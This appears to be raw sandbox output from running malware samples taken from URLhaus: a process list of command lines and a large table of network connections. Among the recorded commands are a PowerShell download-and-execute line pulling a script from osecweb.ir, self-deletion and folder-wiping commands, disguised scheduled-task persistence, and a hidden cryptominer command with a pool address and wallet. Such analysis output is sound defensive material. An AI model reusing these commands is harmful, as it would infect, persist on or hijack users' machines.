C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DGDAEHCBGIIJ" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| N/A | 127.0.0.1:60079 | tcp | |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | cdn.chuk.cz | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | utorrent-backup-server4.top | udp |
| US | 8.8.8.8:53 | utorrent-backup-server3.top | udp |
| CN | 139.196.31.48:14417 | tcp | |
| CN | 139.196.31.48:2324 | tcp | |
| JP | 121.1.252.90:80 | 121.1.252.90 | tcp |
| CN | 114.215.27.238:2324 | tcp | |
| CN | 101.229.61.157:8072 | tcp | |
| CN | 114.215.27.238:8100 | tcp | |
| CN | 110.90.9.121:8072 | tcp | |
| CN | 114.215.27.238:8072 | tcp | |
| CN | 61.144.96.138:888 | tcp | |
| CH | 138.188.36.82:80 | 138.188.36.82 | tcp |
| TR | 5.26.97.52:88 | 5.26.97.52 | tcp |
| JP | 122.31.166.101:80 | 122.31.166.101 | tcp |
| CH | 138.188.34.220:80 | 138.188.34.220 | tcp |
| IN | 111.118.250.244:80 | 111.118.250.244 | tcp |
| CA | 76.11.16.231:80 | 76.11.16.231 | tcp |
| TR | 178.242.54.178:80 | 178.242.54.178 | tcp |
| US | 75.18.210.21:80 | 75.18.210.21 | tcp |
| DE | 62.216.196.186:80 | 62.216.196.186 | tcp |
| HK | 219.77.72.53:80 | tcp | |
| BR | 179.89.224.192:80 | 179.89.224.192 | tcp |
| CA | 99.233.83.22:80 | 99.233.83.22 | tcp |
| MO | 202.175.60.117:80 | 202.175.60.117 | tcp |
| FR | 80.15.103.89:80 | 80.15.103.89 | tcp |
| CN | 110.40.250.173:2324 | tcp | |
| CN | 113.85.101.199:81 | tcp | |
| US | 67.190.47.69:8081 | 67.190.47.69 | tcp |
| CN | 124.70.36.56:80 | tcp | |
| IT | 93.47.199.117:80 | 93.47.199.117 | tcp |
| TW | 122.116.26.47:4080 | 122.116.26.47 | tcp |
| KR | 121.142.127.237:8605 | 121.142.127.237 | tcp |
| CN | 121.235.184.125:9000 | tcp | |
| TW | 122.116.26.47:8443 | 122.116.26.47 | tcp |
| CN | 61.183.16.127:14417 | tcp | |
| CN | 58.208.14.94:88 | tcp | |
| TR | 178.242.54.178:88 | 178.242.54.178 | tcp |
| KR | 218.155.74.6:7070 | 218.155.74.6 | tcp |
| CN | 150.158.146.215:80 | tcp | |
| CN | 49.81.40.231:111 | tcp | |
| BR | 187.59.102.238:9090 | 187.59.102.238 | tcp |
| CN | 111.42.156.130:8000 | tcp | |
| CN | 49.81.203.0:111 | tcp | |
| KR | 222.104.204.78:8000 | 222.104.204.78 | tcp |
| BR | 189.61.50.98:8080 | 189.61.50.98 | tcp |
| US | 159.250.122.151:8081 | 159.250.122.151 | tcp |
| KR | 59.19.185.137:8602 | 59.19.185.137 | tcp |
| CN | 47.103.126.166:8072 | tcp | |
| ES | 37.13.48.49:80 | 37.13.48.49 | tcp |
| US | 68.59.153.1:49274 | 68.59.153.1 | tcp |
| HK | 149.88.73.206:80 | 149.88.73.206 | tcp |
| US | 141.155.36.213:41790 | 141.155.36.213 | tcp |
| CA | 184.145.33.5:80 | 184.145.33.5 | tcp |
| CN | 43.241.17.145:8899 | tcp | |
| KR | 121.154.20.150:80 | 121.154.20.150 | tcp |
| US | 96.250.166.185:88 | 96.250.166.185 | tcp |
| US | 24.252.169.236:80 | 24.252.169.236 | tcp |
| CA | 76.67.131.51:80 | 76.67.131.51 | tcp |
| MX | 187.144.154.105:80 | 187.144.154.105 | tcp |
| CA | 76.68.62.152:80 | 76.68.62.152 | tcp |
| CA | 99.234.132.85:80 | 99.234.132.85 | tcp |
| MX | 187.225.233.208:80 | 187.225.233.208 | tcp |
| KR | 14.37.138.88:8602 | 14.37.138.88 | tcp |
| CA | 142.67.169.45:80 | 142.67.169.45 | tcp |
| BE | 109.137.108.215:8083 | 109.137.108.215 | tcp |
| US | 166.145.98.1:80 | 166.145.98.1 | tcp |
| FR | 109.210.138.197:80 | 109.210.138.197 | tcp |
| TR | 5.26.174.234:80 | 5.26.174.234 | tcp |
| NL | 85.31.47.135:80 | 85.31.47.135 | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server3.top | tcp |
| BG | 87.121.86.206:80 | 87.121.86.206 | tcp |
| BG | 87.121.86.206:443 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | security-service-api-link.cc | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | win-network-checker.cc | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | utorrent-backup-server5.top | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 172.67.204.246:443 | cdn.chuk.cz | tcp |
| US | 8.8.8.8:53 | update-checker-status.cc | udp |
| CN | 117.50.194.20:80 | tcp | |
| CN | 60.29.43.10:8072 | tcp | |
| ES | 178.156.109.69:81 | 178.156.109.69 | tcp |
| KR | 112.217.207.130:80 | 112.217.207.130 | tcp |
| CN | 36.138.125.70:8089 | tcp | |
| JP | 115.37.8.16:80 | 115.37.8.16 | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| DO | 181.36.153.151:81 | 181.36.153.151 | tcp |
| NL | 194.122.165.149:80 | 194.122.165.149 | tcp |
| JP | 18.181.154.24:80 | 18.181.154.24 | tcp |
| NL | 194.122.191.15:90 | 194.122.191.15 | tcp |
| ES | 94.76.156.101:280 | 94.76.156.101 | tcp |
| NL | 83.87.76.41:80 | 83.87.76.41 | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| US | 8.8.8.8:53 | cfs7.blog.daum.net | udp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| US | 8.8.8.8:53 | qiniuyunxz.yxflzs.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.47.31.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.103.15.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.138.210.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.196.216.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.199.47.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.34.188.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.36.155.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.166.250.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.48.13.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.131.67.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.33.145.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.169.67.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.62.68.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.169.252.24.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.16.11.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.132.234.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.97.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.174.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.83.233.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.54.242.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.153.59.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.98.145.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.122.250.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.47.190.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.76.87.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.109.156.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.156.76.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.210.18.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.36.188.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.154.144.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | monastery.mlnk.net | udp |
| US | 8.8.8.8:53 | download.caihong.com | udp |
| US | 8.8.8.8:53 | www.xn--on3b15m2lco2u.com | udp |
| US | 8.8.8.8:53 | 208.233.225.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.50.61.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.224.89.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.191.122.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.60.175.202.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.72.77.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.153.36.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.252.1.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.74.155.218.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.127.142.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.185.19.59.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.104.222.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.26.116.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.166.31.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.138.37.14.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.20.154.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.154.181.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.73.88.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.8.37.115.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.207.217.112.in-addr.arpa | udp |
| CZ | 77.240.97.71:81 | 77.240.97.71 | tcp |
| CN | 183.60.150.17:80 | qiniuyunxz.yxflzs.com | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| BG | 88.213.212.10:80 | monastery.mlnk.net | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| KR | 211.231.99.68:80 | cfs7.blog.daum.net | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| CN | 111.6.202.202:80 | download.caihong.com | tcp |
| KR | 221.139.49.8:80 | www.xn--on3b15m2lco2u.com | tcp |
| US | 8.8.8.8:53 | 71.97.240.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.212.213.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.49.139.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.99.231.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.165.122.194.in-addr.arpa | udp |
| HK | 43.132.12.146:9000 | 43.132.12.146 | tcp |
| US | 8.8.8.8:53 | cd.textfiles.com | udp |
| US | 8.8.8.8:53 | 238.102.59.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.12.132.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | frojbdawmiojfg.sytes.net | udp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| CN | 47.94.196.131:80 | tcp | |
| TH | 103.230.121.82:80 | 103.230.121.82 | tcp |
| US | 8.8.8.8:53 | update.cg100iii.com | udp |
| JP | 141.147.155.36:8888 | 141.147.155.36 | tcp |
| US | 208.86.224.90:80 | cd.textfiles.com | tcp |
| VN | 103.110.33.188:80 | 103.110.33.188 | tcp |
| CA | 50.65.169.30:81 | 50.65.169.30 | tcp |
| GB | 163.181.154.238:80 | update.cg100iii.com | tcp |
| US | 8.8.8.8:53 | 82.121.230.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.224.86.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.169.65.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.155.147.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.33.110.103.in-addr.arpa | udp |
| TH | 58.137.135.190:8080 | 58.137.135.190 | tcp |
| US | 8.8.8.8:53 | 190.135.137.58.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | pivko.sbs | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| CN | 113.106.6.106:14319 | tcp | |
| US | 8.8.8.8:53 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | udp |
| US | 8.8.8.8:53 | ns.smallsrv.com | udp |
| US | 8.8.8.8:53 | paytest.infinitegalaxy.cn | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 137.8.203.116.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| CN | 112.33.27.73:443 | tcp | |
| CN | 112.124.28.233:5566 | tcp | |
| US | 8.8.8.8:53 | down.pcclear.com | udp |
| US | 8.8.8.8:53 | 360down7.miiyun.cn | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| GB | 82.31.159.47:80 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | tcp |
| RU | 46.17.104.173:80 | ns.smallsrv.com | tcp |
| CN | 117.50.95.62:9880 | paytest.infinitegalaxy.cn | tcp |
| US | 8.8.8.8:53 | epei77.direct.quickconnect.to | udp |
| US | 8.8.8.8:53 | 47.159.31.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.104.17.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| DE | 136.243.104.235:443 | tcp | |
| US | 8.8.8.8:53 | 148.129.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.104.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 142.250.187.206:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 68.108.119.30:22420 | 68.108.119.30 | tcp |
| US | 8.8.8.8:53 | nerve.untergrund.net | udp |
| KR | 211.110.226.148:80 | down.pcclear.com | tcp |
| CN | 218.12.76.158:80 | 360down7.miiyun.cn | tcp |
| CN | 47.120.46.210:80 | tcp | |
| CN | 110.40.32.156:80 | qiniuyunxz.yxflzs.com | tcp |
| CN | 111.6.201.155:80 | download.caihong.com | tcp |
| US | 8.8.8.8:53 | server.toeicswt.co.kr | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.119.108.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.226.110.211.in-addr.arpa | udp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| KR | 218.147.147.172:80 | epei77.direct.quickconnect.to | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 172.147.147.218.in-addr.arpa | udp |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| US | 8.8.8.8:53 | 1717.1000uc.com | udp |
| CN | 203.2.65.29:8088 | tcp | |
| US | 8.8.8.8:53 | elisans.novayonetim.com | udp |
| GB | 82.31.159.47:80 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | tcp |
| US | 8.8.8.8:53 | media.githubusercontent.com | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| US | 8.8.8.8:53 | utorrent-backup-server.top | udp |
| US | 8.8.8.8:53 | www.333zz.top | udp |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 24.93.22.147:8081 | 24.93.22.147 | tcp |
| US | 166.166.188.230:80 | 166.166.188.230 | tcp |
| AT | 81.10.240.105:80 | 81.10.240.105 | tcp |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| CN | 49.232.126.36:9000 | tcp | |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| MA | 102.53.15.54:80 | 102.53.15.54 | tcp |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| DE | 146.0.42.82:80 | 146.0.42.82 | tcp |
| CN | 106.42.31.65:8088 | tcp | |
| KW | 178.61.160.6:5001 | 178.61.160.6 | tcp |
| CN | 42.193.42.92:80 | tcp | |
| DE | 185.254.96.92:80 | 185.254.96.92 | tcp |
| US | 8.8.8.8:53 | a12xxx1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | osecweb.ir | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | a19ccc1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | karoonpc.com | udp |
| US | 8.8.8.8:53 | src1.minibai.com | udp |
| US | 8.8.8.8:53 | desquer.ens.uabc.mx | udp |
| US | 8.8.8.8:53 | 82.42.0.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.96.254.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.15.53.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.240.10.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.48.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.22.93.24.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.160.61.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.207.178.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.188.166.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.89.167.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| US | 170.250.53.236:80 | 170.250.53.236 | tcp |
| DE | 185.88.60.242:80 | nerve.untergrund.net | tcp |
| KR | 210.116.108.238:80 | server.toeicswt.co.kr | tcp |
| US | 8.8.8.8:53 | softdl.360tpcdn.com | udp |
| US | 8.8.8.8:53 | www.maxmoney.com | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 242.60.88.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d.kpzip.com | udp |
| US | 8.8.8.8:53 | 236.53.250.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.108.116.210.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| US | 8.8.8.8:53 | 65.72.156.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ly.9377.com | udp |
| NL | 4.180.120.64:8000 | 4.180.120.64 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | 64.120.180.4.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | global.pcclear.com | udp |
| KR | 114.108.160.134:80 | global.pcclear.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 166.150.43.236:80 | 166.150.43.236 | tcp |
| US | 185.199.109.133:443 | media.githubusercontent.com | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| HK | 47.79.66.205:80 | a12xxx1.oss-cn-hongkong.aliyuncs.com | tcp |
| TR | 176.53.14.120:80 | elisans.novayonetim.com | tcp |
| GB | 79.133.176.178:80 | 1717.1000uc.com | tcp |
| HK | 47.79.66.211:443 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server.top | tcp |
| IR | 217.172.98.87:443 | karoonpc.com | tcp |
| IR | 185.79.156.69:80 | osecweb.ir | tcp |
